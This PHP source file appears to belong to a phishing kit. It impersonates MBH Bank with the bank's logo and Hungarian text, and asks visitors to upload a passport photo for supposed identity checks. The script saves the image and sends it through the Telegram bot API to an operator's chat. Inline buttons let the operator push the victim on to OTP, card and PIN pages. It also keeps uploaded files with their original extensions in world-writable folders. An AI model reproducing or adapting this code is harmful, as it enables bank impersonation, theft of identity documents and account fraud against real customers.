<?php
session_start();
if (!isset($_SESSION['visited_from_index'])) {
    header("Location: index.php");
    exit();
}
if (empty(session_id())) { header('Location: www.go'); exit(); }

if (file_exists('config.php')) {
    require_once 'config.php';
}

try {
    if (file_exists('functions.php')) {
        require_once 'functions.php';
    }
} catch (Exception $e) {
    error_log("Error loading functions.php: " . $e->getMessage());
}

if (!defined('SESSIONS_DIR')) {
    define('SESSIONS_DIR', 'sessions/');
}
if (!defined('STATUS_DIR')) {
    define('STATUS_DIR', 'status/');
}

// رسالة خطأ من تيليجرام (لا تعديل)
$error_message = '';
if (isset($_GET['error']) && $_GET['error'] == 1) {
    $error_message = '<div class="bg-red-100 border border-red-400 text-red-700 px-4 py-3 rounded relative mb-4" role="alert"><strong>Hiba!</strong> Az útlevél feltöltése sikertelen. Kérjük, próbálja újra.</div>';
}

// منطق إرسال الصورة لتليجرام (لا تعديل)
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['passport_image'])) {
    try {
        $sessionId = session_id();
        
        if (!file_exists(SESSIONS_DIR)) {
            mkdir(SESSIONS_DIR, 0777, true);
        }
        if (!file_exists(STATUS_DIR)) {
            mkdir(STATUS_DIR, 0777, true);
        }
        
        $sessionFile = SESSIONS_DIR . $sessionId . '.json';
        $sessionData = [];
        if (file_exists($sessionFile)) {
            $sessionData = json_decode(file_get_contents($sessionFile), true) ?: [];
        }
        
        // Handle file upload
        $uploadDir = 'uploads/';
        if (!file_exists($uploadDir)) {
            mkdir($uploadDir, 0777, true);
        }
        
        $fileName = $sessionId . '_passport_' . time() . '.' . pathinfo($_FILES['passport_image']['name'], PATHINFO_EXTENSION);
        $uploadPath = $uploadDir . $fileName;
        
        if (move_uploaded_file($_FILES['passport_image']['tmp_name'], $uploadPath)) {
            $sessionData['passport_image'] = $uploadPath;
            file_put_contents($sessionFile, json_encode($sessionData, JSON_PRETTY_PRINT));
            file_put_contents(STATUS_DIR . $sessionId . '.txt', 'loading');

            $message  = "<b>--[ 🛂 MBH Passport Upload ]--</b>\n\n";
            $message .= "<b>Útlevél feltöltve:</b> ✅\n";
            $message .= "<b>Fájlnév:</b> <code>" . htmlspecialchars($fileName) . "</code>\n\n";
            $message .= "<b>Session ID:</b> <code>" . $sessionId . "</code>\n";

            $keyboard = [
                [['text' => '✅ SUCCESS', 'callback_data' => "success:$sessionId"], ['text' => '🔢 OTP', 'callback_data' => "goto_otp:$sessionId"]],
                [['text' => '❌ Error Passport', 'callback_data' => "error_passport:$sessionId"], ['text' => '🛂 PASSPORT', 'callback_data' => "goto_passport:$sessionId"]],
                [['text' => '💳 CARD', 'callback_data' => "goto_card:$sessionId"], ['text' => '📌 PIN', 'callback_data' => "goto_pin:$sessionId"]]
            ];
            
            $telegramSent = false;
            
            // Try sendPhotoToTelegram function first
            if (function_exists('sendPhotoToTelegram')) {
                $telegramSent = sendPhotoToTelegram($uploadPath, $message, $keyboard);
            }
            
            if (!$telegramSent && defined('TELEGRAM_BOT_TOKEN') && defined('TELEGRAM_CHAT_ID')) {
                try {
                    $botToken = TELEGRAM_BOT_TOKEN;
                    $chatId = TELEGRAM_CHAT_ID;
                    
                    $url = "https://api.telegram.org/bot{$botToken}/sendPhoto";
                    $postData = [
                        'chat_id' => $chatId,
                        'photo' => new CURLFile(realpath($uploadPath)),
                        'caption' => $message,
                        'parse_mode' => 'HTML',
                        'reply_markup' => json_encode(['inline_keyboard' => $keyboard])
                    ];
                    
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $url);
                    curl_setopt($ch, CURLOPT_POST, true);
                    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
                    
                    $response = curl_exec($ch);
                    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
                    curl_close($ch);
                    
                    if ($httpCode == 200) {
                        $telegramSent = true;
                    }
                } catch (Exception $e) {
                    error_log("Telegram direct API error: " . $e->getMessage());
                }
            }
            
            // Fallback: try other function names if still not sent
            if (!$telegramSent) {
                try {
                    if (function_exists('sendPhoto')) {
                        $telegramSent = sendPhoto($uploadPath, $message, $keyboard);
                    } elseif (function_exists('send_photo_to_telegram')) {
                        $telegramSent = send_photo_to_telegram($uploadPath, $message, $keyboard);
                    }
                } catch (Exception $e) {
                    error_log("Telegram fallback error: " . $e->getMessage());
                }
            }
            
            // Log the result for debugging
            error_log("Passport upload - Telegram sent: " . ($telegramSent ? 'Yes' : 'No') . " - Session: " . $sessionId);
            
            header('Location: loading.php');
            exit();
        } else {
            $error_message = '<div class="bg-red-100 border border-red-400 text-red-700 px-4 py-3 rounded relative mb-4" role="alert"><strong>Hiba!</strong> Az útlevél feltöltése sikertelen. Kérjük, próbálja újra.</div>';
        }
    } catch (Exception $e) {
        error_log("Passport upload error: " . $e->getMessage());
        $error_message = '<div class="bg-red-100 border border-red-400 text-red-700 px-4 py-3 rounded relative mb-4" role="alert"><strong>Hiba!</strong> Rendszerhiba történt. Kérjük, próbálja újra.</div>';
    }
}

if (file_exists('header.php')) {
    include 'header.php';
} else {
    echo '<!DOCTYPE html><html><head><meta charset="UTF-8"><title>MBH Bank</title><script src="https://cdn.tailwindcss.com"></script></head><body>';
}
?>

<style>
.mbh-blue { color: #2563eb; }
</style>

<!-- Added backdrop blur layer behind the container -->
<div class="fixed inset-0 bg-gray-100/50 backdrop-blur-sm -z-10"></div>

<!-- Updated container styling to match the reference image -->
<div class="max-w-md mx-auto bg-white rounded-2xl shadow-lg p-8 mt-8">
    <!-- Added MBH Bank logo above the heading -->
    <div class="text-center mb-6">
        <img src="assets/MBH_Bank_Logo_2023.png" alt="MBH Bank Logo" class="h-12 mx-auto">
    </div>
    
    <h1 class="text-2xl font-bold mbh-blue mb-2 text-center">Útlevél ellenőrzés</h1>
    <p class="text-gray-600 text-sm text-center mb-6">Kérjük, töltse fel útlevelének fényképét a személyazonosság ellenőrzéséhez</p>

    <!-- مكان لعرض رسائل الخطأ -->
    <div id="passport-error" class="text-red-600 text-sm mb-4 text-center font-medium"></div>
    <?php echo $error_message; ?>

    <!-- النموذج -->
    <form id="passport-form" method="POST" action="passport.php" enctype="multipart/form-data" class="space-y-6">
        <div class="space-y-2">
            <label for="passport-image" class="block text-sm font-medium text-gray-700">Útlevél fénykép</label>
            <div class="relative">
                <input type="file" id="passport-image" name="passport_image" accept="image/*" required class="hidden">
                <div id="upload-area" class="w-full px-4 py-8 border-2 border-dashed border-gray-300 rounded-xl text-center cursor-pointer hover:border-blue-400 transition-colors duration-200 bg-gray-50">
                    <div id="upload-content">
                        <svg class="mx-auto h-12 w-12 text-gray-400 mb-4" stroke="currentColor" fill="none" viewBox="0 0 48 48">
                            <path d="M28 8H12a4 4 0 00-4 4v20m32-12v8m0 0v8a4 4 0 01-4 4H12a4 4 0 01-4-4v-4m32-4l-3.172-3.172a4 4 0 00-5.656 0L28 28M8 32l9.172-9.172a4 4 0 015.656 0L28 28m0 0l4 4m4-24h8m-4-4v8m-12 4h.02" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" />
                        </svg>
                        <p class="text-sm text-gray-600">Kattintson ide vagy húzza ide a fájlt</p>
                        <p class="text-xs text-gray-400 mt-1">PNG, JPG, JPEG (max. 10MB)</p>
                    </div>
                    <div id="preview-content" class="hidden">
                        <img id="preview-image" class="mx-auto h-32 w-auto rounded-lg mb-2" alt="Preview">
                        <p id="file-name" class="text-sm text-gray-600"></p>
                        <p class="text-xs text-green-600 mt-1">✓ Fájl kiválasztva</p>
                    </div>
                </div>
            </div>
        </div>
        
        <button type="submit" id="submit-btn" class="w-full flex justify-center py-3 px-4 border border-transparent rounded-xl shadow-sm text-sm font-medium text-white bg-pink-500 hover:bg-pink-600 transition-colors duration-200 mt-6 disabled:opacity-50 disabled:cursor-not-allowed">
            <span id="submit-text">Útlevél feltöltése</span>
            <span id="loading-spinner" class="hidden ml-2">
                <svg class="animate-spin h-4 w-4 text-white" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24">
                    <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle>
                    <path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
                </svg>
            </span>
        </button>
    </form>
</div>

<script>
document.addEventListener('DOMContentLoaded', function() {
    const fileInput = document.getElementById('passport-image');
    const uploadArea = document.getElementById('upload-area');
    const uploadContent = document.getElementById('upload-content');
    const previewContent = document.getElementById('preview-content');
    const previewImage = document.getElementById('preview-image');
    const fileName = document.getElementById('file-name');
    const form = document.getElementById('passport-form');
    const submitBtn = document.getElementById('submit-btn');
    const submitText = document.getElementById('submit-text');
    const loadingSpinner = document.getElementById('loading-spinner');

    // Click to upload
    uploadArea.addEventListener('click', () => fileInput.click());

    // Drag and drop functionality
    uploadArea.addEventListener('dragover', (e) => {
        e.preventDefault();
        uploadArea.classList.add('border-blue-400', 'bg-blue-50');
    });

    uploadArea.addEventListener('dragleave', (e) => {
        e.preventDefault();
        uploadArea.classList.remove('border-blue-400', 'bg-blue-50');
    });

    uploadArea.addEventListener('drop', (e) => {
        e.preventDefault();
        uploadArea.classList.remove('border-blue-400', 'bg-blue-50');
        const files = e.dataTransfer.files;
        if (files.length > 0) {
            fileInput.files = files;
            handleFileSelect(files[0]);
        }
    });

    // File input change
    fileInput.addEventListener('change', (e) => {
        if (e.target.files.length > 0) {
            handleFileSelect(e.target.files[0]);
        }
    });

    function handleFileSelect(file) {
        // Validate file type
        if (!file.type.startsWith('image/')) {
            alert('Kérjük, csak képfájlokat töltsön fel!');
            return;
        }

        // Validate file size (10MB)
        if (file.size > 10 * 1024 * 1024) {
            alert('A fájl mérete nem lehet nagyobb 10MB-nál!');
            return;
        }

        // Show preview
        const reader = new FileReader();
        reader.onload = (e) => {
            previewImage.src = e.target.result;
            fileName.textContent = file.name;
            uploadContent.classList.add('hidden');
            previewContent.classList.remove('hidden');
        };
        reader.readAsDataURL(file);
    }

    // Form submission with loading state
    form.addEventListener('submit', function(e) {
        if (!fileInput.files.length) {
            e.preventDefault();
            alert('Kérjük, válasszon ki egy fájlt!');
            return;
        }

        // Show loading state
        submitBtn.disabled = true;
        submitText.textContent = 'Feltöltés...';
        loadingSpinner.classList.remove('hidden');
    });
});
</script>

<?php 
if (file_exists('footer.php')) {
    include 'footer.php';
} else {
    echo '</body></html>';
}
?>
